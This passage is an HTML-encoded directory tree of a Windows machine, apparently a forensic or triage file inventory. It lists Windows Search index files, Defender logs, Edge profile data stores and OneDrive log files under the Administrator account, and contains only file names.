&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; SystemIndex
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; SystemIndex.1.Crwl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; SystemIndex.2.Crwl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; SystemIndex.2.gthr
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; SystemIndex.3.Crwl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; SystemIndex.3.gthr
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; SystemIndex.4.Crwl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; SystemIndex.4.gthr
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; SystemIndex.5.gthr
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; SystemIndex.6.gthr
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; Windows.edb
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9492;&#9472;&#9472; Windows.jfm
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Windows
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Start Menu
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Programs
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Immersive Control Panel.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; Microsoft Edge.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Windows Defender
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; Support
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; MPDetection-20250814-092825.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; MPDeviceControl-20250815-211450.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; MPLog-20250421-104305.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; MPScanSkip-20250815-211450.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; MpWppCoreTracing-20250815-142151-00000003-100000000.bin
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; MpWppCoreTracing-20250820-094743-00000003-100000000.bin
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; MpWppCoreTracing-20250820-101110-00000003-100000000.bin
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; MpWppCoreTracing-20250824-154427-00000003-100000000.bin
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; MpWppCoreTracing-20250824-161359-00000003-100000000.bin
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; MpWppCoreTracing-20250825-125026-00000003-100000000.bin
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; MpWppTracing-20250815-212151-00000003-fffffffeffffffff.bin
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; MpWppTracing-20250820-164749-00000003-fffffffeffffffff.bin
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; MpWppTracing-20250820-171136-00000003-fffffffeffffffff.bin
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; MpWppTracing-20250824-224427-00000003-fffffffeffffffff.bin
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; MpWppTracing-20250824-231418-00000003-fffffffeffffffff.bin
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9492;&#9472;&#9472; MpWppTracing-20250825-195027-00000003-fffffffeffffffff.bin
&#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Users
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Administrator
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppData
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Local
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ConnectedDevicesPlatform
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; L.Administrator
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; ActivitiesCache.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; ActivitiesCache.db-shm
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; ActivitiesCache.db-wal
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Edge
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; User Data
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Default
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Collections
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; collectionsSQLite
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Favicons
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; History
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; History-journal
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Login Data
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Network Action Predictor
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Preferences
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Sessions
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Session_13400625977096635
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Tabs_13400626023916579
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Shortcuts
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Top Sites
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Web Data
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; Web Data-journal
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Internet Explorer
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; brndlog.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CacheStorage
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; edb.chk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; edb.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; edbres00001.jrs
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ie4uinit-ClearIconCache.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ie4uinit-UserConfig.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; IECompatData
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; iecompatdata.xml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; MSIMGSIZ.DAT
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDrive
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; logs
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Common
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileCoAuth-2025-08-15.2106.1464.1.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileCoAuth-2025-08-15.2106.1464.2.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileCoAuth-2025-08-15.2122.6376.1.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileCoAuth-2025-08-15.2122.6376.2.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileCoAuth-2025-08-20.1657.9712.1.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileCoAuth-2025-08-20.1657.9712.2.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileCoAuth-2025-08-20.1714.2544.1.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileCoAuth-2025-08-20.1714.2544.2.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileCoAuth-2025-08-20.1723.3084.1.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileCoAuth-2025-08-20.1723.3084.2.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileCoAuth-2025-08-25.1952.7744.1.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileCoAuth-2025-08-25.1952.7744.2.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSyncConfig-2025-08-15.2106.2416.1.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; general.keystore
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDriveLauncher-2025-08-15.2132.5732.1.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDriveLauncher-2025-08-15.2132.5732.2.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDriveLauncher-2025-08-20.1722.2228.1.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDriveLauncher-2025-08-20.1722.2228.2.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDriveLauncher-2025-08-25.2002.3540.1.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDriveLauncher-2025-08-25.2002.3540.2.aodl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; StandaloneUpdater-2025-08-15.2107.3308.1.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; StandaloneUpdater-2025-08-20.1720.2884.1.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; StandaloneUpdater-2025-08-20.1720.8080.1.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; StandaloneUpdater-2025-08-25.1956.8284.1.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; StandaloneUpdater-2025-08-25.1956.8764.1.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; telemetry-dll-ramp-value.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ListSync
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Business1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; general.keystore
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; microsoftNucleusTelemetryCache.otc
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Nucleus-2025-08-15.2106.1784.1.odlgz
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Nucleus-2025-08-15.2106.1784.2.odlgz
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Nucleus-2025-08-20.1725.7484.1.odlgz
